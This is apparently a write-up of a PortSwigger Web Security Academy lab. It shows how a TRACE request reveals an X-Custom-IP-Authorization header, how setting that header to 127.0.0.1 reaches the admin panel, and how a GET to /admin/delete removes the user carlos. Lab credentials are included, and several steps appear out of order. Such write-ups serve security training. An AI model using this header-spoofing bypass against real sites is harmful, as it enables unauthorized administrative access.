Authentication bypass via information disclosure
https://portswigger.net/web-security/information-disclosure/exploiting/lab-infoleak-authentication-bypass
Last updated
https://portswigger.net/web-security/information-disclosure/exploiting/lab-infoleak-authentication-bypass
Last updated
This lab's administration interface has an authentication bypass vulnerability, but it is impractical to exploit without knowledge of a custom HTTP header used by the front-end.
To solve the lab, obtain the header name then use it to bypass the lab's authentication. Access the admin interface and delete the user carlos
.
You can log in to your own account using the following credentials: wiener:peter
and we can see this information disclosure message: "Admin interface only available to local users"
so, we start to analyze request for understanding more things
We can try to change request method to see if the answer changes.
It will happen via TRACE method with the response status code 200.
Trace is a debug method and it display us an important information as: X-Custom-IP-Authorization: 37.101.171.137
We can copy it inserting a localhost IP: 127.0.0.1 in our request and change again method to GET
Now we're into admin panel having the permission to delete 'carlos' user
analyzing the reponse, there's a URL that permits to delete 'carlos' account: GET /admin/delete?username=carlos
Copy and add it into our request to delete account and solve the lab.
Starting access to wiener user
Checking page sources there're not of interesting, so we can try access to admin page adding /admin path to our URL: